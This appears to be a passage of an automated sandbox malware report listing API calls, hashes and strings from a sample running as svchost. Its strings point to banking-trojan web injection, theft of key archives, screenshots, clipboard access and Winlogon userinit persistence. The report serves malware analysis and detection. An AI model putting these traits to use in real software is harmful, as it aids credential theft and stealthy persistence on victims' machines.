                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85614A309402595FEB22CB349C58BFB7BE5EF86300F444694E9CAD7241DF719A48CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(02CDFB20,00000000,00000000,00000000,?,02CA1A39), ref: 02CA1330
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020,?,02CA1A39), ref: 02CA1398
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02CA1A39), ref: 02CA139F
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA141F
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA1439
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA1453
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA146D
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA1497
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020), ref: 02CA14B4
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA14BB
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA15E4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA161C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA161F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA162C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA162F
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(02CDFB20,?,02CA1A39), ref: 02CA163A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$strstr$Process$AllocCriticalSection$EnterFreeLeaveValidate
                                                                                                                                                                                                              • String ID: data_after$data_before$data_end$data_inject$set_url
                                                                                                                                                                                                              • API String ID: 2387113551-2328515424
                                                                                                                                                                                                              • Opcode ID: a96c559e689e99b5ccf3e0aa648dfcec692594ddf2f0cd1ec9744256355ceb3f
                                                                                                                                                                                                              • Instruction ID: 39fc0abfd944bdde367f4f3f648a760df3e40da01be98c267e4c7c60ae3c7f0a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a96c559e689e99b5ccf3e0aa648dfcec692594ddf2f0cd1ec9744256355ceb3f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FA1D7749453429FDB21CF38C4687667FE5AF85348F1886ADD88BCB601EBB1D605CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02C9DF80: GetDesktopWindow.USER32 ref: 02C9DF8E
                                                                                                                                                                                                                • Part of subcall function 02C9DF80: RealChildWindowFromPoint.USER32(00000000,?,02C9E016,?,02C9A857,?,74DF30D0,?), ref: 02C9DF95
                                                                                                                                                                                                                • Part of subcall function 02C9DF80: IsWindowVisible.USER32(00000000), ref: 02C9DFC1
                                                                                                                                                                                                                • Part of subcall function 02C9DF80: GetParent.USER32(00000000), ref: 02C9DFC8
                                                                                                                                                                                                                • Part of subcall function 02C9DF80: GetWindowLongA.USER32(00000000,000000EC), ref: 02C9DFD3
                                                                                                                                                                                                                • Part of subcall function 02C9DF80: WindowFromPoint.USER32(74DF30D0,?,?,02C9E016,?,02C9A857,?,74DF30D0,?), ref: 02C9DFE8
                                                                                                                                                                                                              • RealChildWindowFromPoint.USER32(00000000,?,02C9A857,?,02C9A857,?,74DF30D0,?), ref: 02C9E037
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000084,00000000,02C9A857,00000002,00000064,?), ref: 02C9E05D
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9E081
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 02C9E092
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02C9E09D
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 02C9E0BB
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02C9E0C6
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02C9A857), ref: 02C9E0D2
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002), ref: 02C9E0E6
                                                                                                                                                                                                              • GetWindowInfo.USER32(?,?), ref: 02C9E129
                                                                                                                                                                                                              • PtInRect.USER32(?,?,02C9A857), ref: 02C9E154
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 02C9E174
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000084,00000000,02C9A857,00000002,00000064,000000FF), ref: 02C9E1A3
                                                                                                                                                                                                              • MapWindowPoints.USER32(00000000,?,00000000,00000001), ref: 02C9E1D0
                                                                                                                                                                                                              • RealChildWindowFromPoint.USER32(?,00000000,?), ref: 02C9E1DB
                                                                                                                                                                                                              • MapWindowPoints.USER32(?,00000000,00000000,00000001), ref: 02C9E1F7
                                                                                                                                                                                                              • RealChildWindowFromPoint.USER32(00000000,00000000,?), ref: 02C9E202
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Long$FromPoint$ChildReal$MessagePointsSendTimeout$AncestorDesktopInfoMutexObjectParentRectReleaseSingleVisibleWait
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED098), ref: 02CB3920
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB3961
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB396B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB3973
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB3984
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB398B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02CB39BF
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 02CB39CC
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02CB3A10
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02CB3A2C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02CB3A49
                                                                                                                                                                                                              • API ID: DirectoryErrorFileLastPath$AdminAllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemUserVirtuallstrcpyn
                                                                                                                                                                                                              • String ID: \$path.txt$stf.zip
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CAB1F0
                                                                                                                                                                                                                • Part of subcall function 02CAB110: PathAddBackslashA.SHLWAPI(A23C419D), ref: 02CAB137
                                                                                                                                                                                                                • Part of subcall function 02CAB110: GetFileAttributesA.KERNEL32(?), ref: 02CAB175
                                                                                                                                                                                                                • Part of subcall function 02CAB110: PathFileExistsA.SHLWAPI(?), ref: 02CAB1B9
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C419D), ref: 02CAB238
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02CAB2A0
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CAB2AD
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C419D,?,?), ref: 02CAB2E7
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02CAB36A
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02CAB37E
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02CAB391
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000), ref: 02CAB3C0
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C419D), ref: 02CAB3CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CAB3EE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CAB3F1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02CAB3FE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CAB401
                                                                                                                                                                                                              • API ID: Path$BackslashFileHeap$AttributesFreeProcessVirtual$AllocCurrentDeleteDirectoryExistsValidatelstrcpynmemset
                                                                                                                                                                                                              • String ID: 5NT$A23C419D$keys.zip$path.txt
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileType.KERNEL32(?,00000000,00000000), ref: 02CB8899
                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(?,?), ref: 02CB88B6
                                                                                                                                                                                                              • API ID: File$HandleInformationType
                                                                                                                                                                                                              • String ID: ,D0<$,D0<$D0<$D0<
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA323D
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 02CA325E
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02CA327F
                                                                                                                                                                                                              • GetGUIThreadInfo.USER32(00000000), ref: 02CA3286
                                                                                                                                                                                                              • GetOpenClipboardWindow.USER32 ref: 02CA329C
                                                                                                                                                                                                              • GetActiveWindow.USER32 ref: 02CA32AA
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 02CA32D8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013), ref: 02CA32FA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA3301
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA3311
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 02CA332E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA337B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA337E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA338B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA338E
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 02CA3399
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,00000000,00000001), ref: 02CA33DF
                                                                                                                                                                                                              • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                              • memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401264
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000), ref: 00401275
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,00000004,00000000,?,00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401285
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$Process$Handle$AllocCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                              • String ID: G,@
                                                                                                                                                                                                              • API String ID: 132362422-3313068137
                                                                                                                                                                                                              • Opcode ID: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                              • Instruction ID: a7140257f329b7de85cf1082c2828f4b6f45ca3281c26892c76bebf1ae027e6a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C4167B1A00214BBEB109F959D89FAFBB7CEF84B11F10416AFB05F62D0D77459448BA8
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(?,?,00000000,00000000,75B07390,?,02C9148C,00000000,?), ref: 02CB06FA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,02C9148C,00000000,?), ref: 02CB0719
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,02C9148C,00000000,?), ref: 02CB0720
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB0738
                                                                                                                                                                                                              • SetFilePointer.KERNEL32 ref: 02CB0753
                                                                                                                                                                                                              • LockFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 02CB0764
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 02CB0774
                                                                                                                                                                                                              • UnlockFile.KERNEL32(?,?,00000000,?,00000000), ref: 02CB0789
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,BEGIN SIGNATURE), ref: 02CB07A2
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,END SIGNATURE), ref: 02CB07AE
                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,75B07390,?,02C9148C,00000000,?), ref: 02CB07CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,02C9148C,00000000,?), ref: 02CB07DE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02C9148C,00000000,?), ref: 02CB07E1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,02C9148C,00000000,?), ref: 02CB07EE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02C9148C,00000000,?), ref: 02CB07F1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$Process$Pointer$AllocFreeLockReadSizeUnlockValidatememset
                                                                                                                                                                                                              • String ID: BEGIN SIGNATURE$END SIGNATURE
                                                                                                                                                                                                              • API String ID: 373673121-4158457813
                                                                                                                                                                                                              • Opcode ID: bd2cc7b95a5502cae24933e111f86627ac6cea82ba904fdaba79d401141b00ab
                                                                                                                                                                                                              • Instruction ID: f92aa380894622c20966b4fde964dc067f642411fa680d0e4fa77920588cfd96
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd2cc7b95a5502cae24933e111f86627ac6cea82ba904fdaba79d401141b00ab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8631AE71A42300AFE7219F689C49F6FBBACEF88B44F400B19F544E6180D770D905CBA5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB), ref: 02CAC717
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAC765
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAC771
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAC775
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAC786
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAC78D
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02CAC7C0
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAC7CF
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAC7D5
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAC7D9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAC7EA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAC7F1
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CAC81F
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 02CAC835
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$A23C41FB$scrs
                                                                                                                                                                                                              • API String ID: 1455050916-2152751632
                                                                                                                                                                                                              • Opcode ID: 20a78be696418230216b9936fb0f767e02e7802fd80901a4ff16423ebd7cb7fe
                                                                                                                                                                                                              • Instruction ID: ae1d40a63ec7b4eb405eba757877437fdeef43cb4348ec6e26866b1c6584551b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 20a78be696418230216b9936fb0f767e02e7802fd80901a4ff16423ebd7cb7fe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2314B75D013194BCB209B749C98BEB77E8FF49744F840695EA8AD3240DB70DB44CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C40D7), ref: 02CAF2F7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAF33B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAF347
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAF34B
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAF35C
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAF363
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02CAF390
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CAF39F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CAF3A5
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAF3A9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CAF3BA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CAF3C1
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CAF3EF
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 02CAF405
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
• Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$A23C40D7$scrs
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,74DF30D0,00000000), ref: 02CB4A43
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?,75A90180), ref: 02CB4A6D
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 02CB4A8D
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 02CB4ABA
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02CB4ABE
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,00000000,00000002), ref: 02CB4B60
                                                                                                                                                                                                                • Part of subcall function 02CA41B0: GetProcessHeap.KERNEL32(00000000,00000000,02CA3D17,02C978C7), ref: 02CA41BE
                                                                                                                                                                                                                • Part of subcall function 02CA41B0: HeapValidate.KERNEL32(00000000), ref: 02CA41C1
                                                                                                                                                                                                                • Part of subcall function 02CA41B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA41CE
                                                                                                                                                                                                                • Part of subcall function 02CA41B0: HeapFree.KERNEL32(00000000), ref: 02CA41D1
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 02CB4B71
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02CB4B7B
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Value$ProcessQuery$CloseExistsFileFlushFreeOpenPathValidate
                                                                                                                                                                                                              • String ID: C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c45b7), ref: 02CB23B7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB23F9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB2405
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB2409
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB241A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB2421
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB2452
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB2458
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB245C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB246D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB2474
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB24A2
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 02CB24B8
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$a23c45b7$scrs
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C42B7), ref: 02CB1347
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB1389
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB1395
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB1399
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB13AA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB13B1
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB13E2
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB13E8
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB13EC
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB13FD
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB1404
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB1432
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 02CB1448
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$A23C42B7$scrs
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4505), ref: 02CB30A7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB30E9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB30F5
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB30F9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB310A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB3111
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB3142
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB3148
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB314C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB315D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB3164
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB3192
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 02CB31A8
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$A23C4505$scrs
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000C10,74DF3050,74DF30D0,74DF3080), ref: 02CA50B7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA50BA
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA50CE
                                                                                                                                                                                                              • inet_addr.WS2_32(?), ref: 02CA50F5
